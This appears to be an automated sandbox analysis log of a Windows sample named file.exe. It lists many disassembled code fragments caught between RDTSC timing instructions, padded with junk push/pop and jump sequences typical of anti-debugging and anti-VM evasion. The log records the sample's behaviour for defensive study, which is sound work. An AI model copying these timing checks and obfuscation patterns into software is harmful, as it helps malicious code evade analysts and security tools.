                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D77F0 second address: 13D77F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78C0 second address: 13D78C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78C4 second address: 13D78E7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jbe 00007F0F04CBD31Ch 0x00000013 ja 00007F0F04CBD316h 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78E7 second address: 13D78EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78EB second address: 13D7903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F0F04CBD31Bh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE9FA second address: 13DEA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373022 second address: 1373030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373030 second address: 137306A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E417h 0x0000001b jmp 00007F0F0527E40Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDE38 second address: 13DDE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDF97 second address: 13DDFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0F0527E40Ch 0x0000000e ja 00007F0F0527E40Eh 0x00000014 push esi 0x00000015 pop esi 0x00000016 jnc 00007F0F0527E406h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F0F0527E406h 0x00000024 jmp 00007F0F0527E40Fh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E235A second address: 13E2361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E551B second address: 13E553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Fh 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E553B second address: 13E5567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 jmp 00007F0F04CBD329h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E99DC second address: 13E99F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9B3A second address: 13E9B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0F04CBD316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9B44 second address: 13E9B78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0F0527E40Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007F0F0527E416h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9B78 second address: 13E9B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Dh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9DFD second address: 13E9E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jbe 00007F0F0527E406h 0x0000000e pop esi 0x0000000f jmp 00007F0F0527E40Bh 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F0F0527E406h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9FA8 second address: 13E9FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F0F04CBD316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0F04CBD326h 0x00000011 pop esi 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F0F04CBD316h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9FD4 second address: 13E9FDE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F0527E406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA2CC second address: 13EA2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA2D0 second address: 13EA2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA2D4 second address: 13EA322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F04CBD324h 0x0000000d pushad 0x0000000e jno 00007F0F04CBD316h 0x00000014 ja 00007F0F04CBD316h 0x0000001a jc 00007F0F04CBD316h 0x00000020 jmp 00007F0F04CBD326h 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push edx 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA322 second address: 13EA328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA328 second address: 13EA32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA32F second address: 13EA34C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0F0527E406h 0x0000000a jmp 00007F0F0527E413h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA4CE second address: 13EA4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA4D2 second address: 13EA4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F0F0527E406h 0x0000000f jmp 00007F0F0527E413h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7C38 second address: 13B7C46 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7C46 second address: 13B7C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7C4A second address: 13B7C7A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D1F04h], ebx 0x00000012 lea eax, dword ptr [ebp+1248DA2Fh] 0x00000018 stc 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0F04CBD324h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7C7A second address: 1396515 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0F0527E40Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0F0527E408h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 cmc 0x00000029 call dword ptr [ebp+122D1F25h] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8330 second address: 13B833A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B833A second address: 13B833F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B833F second address: 13B8365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F04CBD316h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jp 00007F0F04CBD316h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0F04CBD31Dh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B843B second address: 13B843F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B85A6 second address: 13B85C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F04CBD320h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B85C2 second address: 13B85E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8D0C second address: 13B8D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8D12 second address: 13B8D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F84 second address: 13B8F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F8A second address: 13B8F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F8E second address: 13B8FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D2A6Ah] 0x0000000f mov ecx, 02B9A001h 0x00000014 lea eax, dword ptr [ebp+1248DA2Fh] 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F0F04CBD318h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D39F8h] 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d jnc 00007F0F04CBD320h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8FDE second address: 1397042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F0527E415h 0x0000000f nop 0x00000010 mov edi, eax 0x00000012 call dword ptr [ebp+122D1865h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0F0527E411h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE78E second address: 13EE794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE91D second address: 13EE921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEBDF second address: 13EEC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD329h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d js 00007F0F04CBD32Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEC08 second address: 13EEC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E412h 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEC21 second address: 13EEC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0F04CBD316h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0F04CBD316h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4A4F second address: 13F4A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3814 second address: 13F3818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3818 second address: 13F3845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E419h 0x00000007 jmp 00007F0F0527E410h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39A3 second address: 13F39E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD31Fh 0x0000000b jno 00007F0F04CBD322h 0x00000011 jmp 00007F0F04CBD31Eh 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39E0 second address: 13F39E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39E4 second address: 13F39FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F414D second address: 13F4158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F42E4 second address: 13F42F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F04CBD31Ch 0x00000008 jc 00007F0F04CBD316h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F42F5 second address: 13F42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4452 second address: 13F445F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F0F04CBD316h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F445F second address: 13F446E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0F0527E406h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F446E second address: 13F4477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4477 second address: 13F447D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F447D second address: 13F448F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0F04CBD318h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F76FF second address: 13F7703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA220 second address: 13FA22D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA22D second address: 13FA238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA38D second address: 13FA392 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA392 second address: 13FA398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDD36 second address: 13FDD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDD3A second address: 13FDD4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F0527E40Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE2CC second address: 13FE2D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE2D4 second address: 13FE2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE2DA second address: 13FE2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE2DE second address: 13FE30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E410h 0x00000007 jmp 00007F0F0527E411h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403D4A second address: 1403D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403D54 second address: 1403D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14025C5 second address: 14025CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14025CD second address: 14025D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402A31 second address: 1402A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402A37 second address: 1402A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402BC1 second address: 1402BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F04CBD321h 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F04CBD322h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402BF0 second address: 1402BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402BF4 second address: 1402C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0F04CBD31Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A04 second address: 13B8A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A0A second address: 13B8A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A0E second address: 13B8A80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D38B0h] 0x0000000f mov ebx, dword ptr [ebp+1248DA6Eh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F0F0527E408h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edx, dword ptr [ebp+122D37F8h] 0x00000035 add eax, ebx 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F0F0527E408h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 sub dword ptr [ebp+122D2AA3h], ecx 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a jno 00007F0F0527E406h 0x00000060 pop eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 rdtsc
